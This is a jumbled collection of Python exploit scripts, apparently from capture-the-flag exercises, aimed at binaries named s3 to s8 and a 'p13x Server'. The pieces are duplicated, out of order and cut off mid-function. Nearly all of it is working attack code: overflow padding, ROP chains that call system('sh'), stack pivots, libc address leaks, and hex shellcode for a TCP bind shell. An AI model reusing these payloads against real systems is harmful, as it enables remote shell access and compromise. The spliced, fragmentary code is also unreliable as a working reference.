payload += struct.pack('L', base - 0x40)
payload += struct.pack('L', 0x400630) # read to pivot
target.sendbin(payload)
target.sendeof()
target.tryexpect("If you're cool you'll get a shell.\n")
payload = b'S' * 0x20
payload += struct.pack('L', base)
payload += struct.pack('L', 0x400630) # read to get control back
target.sendbin(payload)
target.sendeof()
target.tryexpect("If you're cool you'll get a shell.\n")
if __name__ == "__main__":
setup = binexpect.setup('./s7')
target = setup.target()
target.setecho(False)
# STAGE 1
payload = b'A' * 0x20
payload += struct.pack('L', base - 0x40) # new stack frame
payload += struct.pack('L', 0x400630) # read
# pivot through main's leave; ret
target.tryexpect("What is your password\?\n")
target.sendbin(payload)
target.sendeof()
target.tryexpect("If you're cool you'll get a shell.\n")
payload = b'B' * 0x20
payload += struct.pack('L', base) # value for rbp
clear_line("[x] Testing single bytes in context.\n")
for x in range(256):
do_test(target, (61, x, 61))
clear_line("[x] Testing multiple bytes in context.\n")
for x in range(256):
for y in range(256):
do_test(target, (61, x, y, 61))
clear_line()
if __name__ == '__main__':
import binexpect
setup = binexpect.setup("cat")
target = setup.target()
target.setecho(False)
try:
os.system('setterm -cursor off')
run_tests(target)
finally:
os.system('setterm -cursor on')
print("[-] Tests done.")
import binascii
import time
import sys
import json
import binexpect
def rop(*args):
return struct.pack('Q'*len(args), *args)
target_host = "localhost" #"attack.samsclass.info" #
target_port = "10100" #"13010" #
setup = binexpect.setup("nc "+ target_host + " " + target_port)
s7 = setup.target()
s7.setecho(False)
s7.tryexpect("Welcome to the p13x Server! buffer = (.*)\nEnter string \(q to quit\)")
buf_addr = int(str(s7.match.group(1), 'utf-8'), 16)
print ("BUF ADDR: " + hex(buf_addr))
def get_shellcode(port):
# simple tcp bind shell, ripped from: http://shell-storm.org/shellcode/files/shellcode-858.php
hexcode = "6a025f6a015e6a065a6a29580f054989c04d31d241524152c604240266c7442402PORT4889e641505f6a105a6a31580f0541505f6a015e6a32580f054889e66a104889e241505f6a2b580f054889c76a035e48ffce6a21580f0575f64831f64831d248bf2f2f62696e2f736848c1ef0857545f6a3b580f05"
# render the port to BIG endian
hexport = str(binascii.hexlify(bytearray([ (port >> 8) & 0xff, port & 0xff])), 'utf-8')
import struct
import binascii
import time
import sys
import json
import binexpect
def rop(*args):
return struct.pack('Q' * len(args), *args)
target_host = "localhost" #"attack.samsclass.info" #
target_port = "10100" #"13010" #
setup = binexpect.setup("nc " + target_host + " " + target_port)
s7 = setup.target()
s7.setecho(False)
s7.tryexpect(
"Welcome to the p13x Server! buffer = (.*)\nEnter string \(q to quit\)")
buf_addr = int(str(s7.match.group(1), 'utf-8'), 16)
print("BUF ADDR: " + hex(buf_addr))
def get_shellcode(port):
# simple tcp bind shell, ripped from: http://shell-storm.org/shellcode/files/shellcode-858.php
hexcode = "6a025f6a015e6a065a6a29580f054989c04d31d241524152c604240266c7442402PORT4889e641505f6a105a6a31580f0541505f6a015e6a32580f054889e66a104889e241505f6a2b580f054889c76a035e48ffce6a21580f0575f64831f64831d248bf2f2f62696e2f736848c1ef0857545f6a3b580f05"
# render the port to BIG endian
#!/usr/bin/env python
import binexpect
import struct
if __name__ == "__main__":
setup = binexpect.setup('./s3')
target = setup.target()
target.setecho(False)
stage1 = b'sh'.ljust(8, b'\x00')
target.tryexpect('What is your name?')
target.sendbinline(stage1)
payload = b'A' * 0x30
payload += b'paddingp' #rbp
payload += struct.pack('L', 0x4007e3) # pop rdi; ret
payload += struct.pack('L', 0x6010a0) # pop'd
payload += struct.pack('L', 0x400772) # system()
target.tryexpect('What is your password?')
target.sendbinline(payload)
target.tryexpect("If you're cool you'll get a shell.")
target.pwned()
#!/usr/bin/env python
import binexpect
import struct
if __name__ == "__main__":
setup = binexpect.setup('./s4')
target = setup.target()
target.setecho(False)
# setting future stack on the bss
stage1 = b'A' * 0x3d8 # padding
stage1 += struct.pack('L', 0x4007e3) # pop rdi; ret
stage1 += struct.pack('L', 0x601490) # pop'd
stage1 += struct.pack('L', 0x400772) # system
stage1 += b'sh'.ljust(8, b'\x00') # "sh"
target.tryexpect('What is your name?')
target.sendbinline(stage1)
# trigger stack pivot
payload = b'A' * 0x30
payload += struct.pack('L', 0x601470) # bss + 0x3d8 bytes
payload += struct.pack('L', 0x40077c) # leave; ret (pivot)
target.tryexpect('What is your password?')
target.sendbinline(payload)
target.tryexpect("If you're cool you'll get a shell.")
target.pwned()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import binexpect
import struct
if __name__ == "__main__":
setup = binexpect.setup('./s5')
target = setup.target()
target.setecho(False)
base = 0x601500 # new stack base
payload = b'A' * 32
payload += struct.pack('L', base) # new stack base
payload += struct.pack('L', 0x400670) # read(0, rbp-0x20, 0x400); [...];leave; ret
# pivot here from main
target.tryexpect('What is your password?')
target.sendbinline(payload)
payload = b'A' * 32
payload += b'BBBBBBBB' # rbp
payload += struct.pack('L', 0x400743) # pop rdi; ret
payload += struct.pack('L', base+0x20) # @'sh'
payload += struct.pack('L', 0x4006c7) # system()
payload += b'sh'.ljust(8, b'\x00') # 'sh'
target.sendbinline(payload)
target.tryexpect("If you're cool you'll get a shell.")
import binexpect
import struct
# 0x4006d1 : leave; ret
# 0x400743 : pop rdi; ret
# 0x400670 : read(0, rbp-0x20, 0x400); [...];leave; ret
# 0x400686 : read(); [...]; leave; ret
# 0x4006c7 : system()
# 0x600ff8 : .got /!\
# 0x601000 : .got.plt /!\
# 0x601050 : .data
# 0x601060 : .bss
if __name__ == "__main__":
setup = binexpect.setup('./s6')
target = setup.target()
target.setecho(False)
base = 0x601520 # stack
# STAGE1:
# pivot stack with call to read
payload = b'A' * 0x20
payload += struct.pack('L', base - 0x30) # new stack base
payload += struct.pack('L', 0x400670) # read(0, rbp-0x20, 0x30); [...];leave; ret
# pivot here from main.
target.tryexpect('What is your password?')
target.sendbin(payload)
# STAGE2:
def get(self, symbol):
if symbol in self.libc_map:
return self.libc_map[symbol]
return None
def rop(*args):
return struct.pack('Q'*len(args), *args)
libc_map = LibcMap()
setup = binexpect.setup("./s7")
s7 = setup.target()
s7.setecho(False)
s7.tryexpect("Welcome Stranger")
s7.tryexpect("What is your password?")
def leak(address):
payload = bytes('A' * 32, 'utf-8')
payload += rop(
0x42424242, # frame pointer
0x00400703, # pop rdi; ret;
address, # leak
0x004004c0, # puts@plt
do_test(target, (x,))
clear_line("[x] Testing single bytes in context.\n")
for x in range(256):
do_test(target, (61, x, 61))
clear_line("[x] Testing multiple bytes in context.\n")
for x in range(256):
for y in range(256):
do_test(target, (61, x, y, 61))
clear_line()
if __name__ == '__main__':
import binexpect
setup = binexpect.setup("cat")
target = setup.target()
target.setecho(False)
try:
os.system('setterm -cursor off')
run_tests(target)
finally:
os.system('setterm -cursor on')
print("[-] Tests done.")
def get(self, symbol):
if symbol in self.libc_map:
return self.libc_map[symbol]
return None
def rop(*args):
return struct.pack('Q'*len(args), *args)
libc_map = LibcMap()
setup = binexpect.setup("./s8")
s8 = setup.target()
s8.setecho(False)
s8.tryexpect("Welcome Stranger")
s8.tryexpect("What is your password\?")
def leak(address):
payload = bytes('A' * 32, 'utf-8')
payload += rop(
0x00601800, # frame pointer
0x00400630, # read@main
)
s8.sendbin(payload)
